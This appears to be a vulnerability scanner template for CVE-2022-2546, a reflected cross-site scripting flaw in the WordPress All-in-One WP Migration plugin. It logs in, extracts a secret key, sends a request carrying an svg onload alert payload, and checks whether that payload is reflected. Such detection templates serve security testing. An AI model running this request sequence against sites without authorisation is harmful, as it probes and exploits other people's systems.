2022-09-25 07:25:10 +00:00
id: CVE-2022-2546
info:
  name: All-in-One WP Migration plugin - Cross-Site Scripting (XSS)
  author: theamanrawat
  severity: medium
  description: |
    Reflected Cross-Site Scripting (XSS) vulnerability in WordPress All-in-One WP Migration plugin (versions <= 7.62).
  reference:
    - https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58
    - https://wordpress.org/plugins/all-in-one-wp-migration/
    - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2546
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2546
  classification:
    cve-id: CVE-2022-2546
  metadata:
    verified: true
  tags: cve,cve2022,wordpress,wp-plugin,wp,xss,all-in-one-wp-migration,authenticated
requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1
        Host: {{Hostname}}
    cookie-reuse: true
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - contains(all_headers_3, "text/html")
          - status_code_3 == 200
          - contains(body_3, '{\"new_value\":[\"XSSPAYLOAD<svg onload=alert(document.domain)>')
        condition: and
    extractors:
      - type: regex
        name: secretkey
        group: 1
        regex:
          - 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"'
        internal: true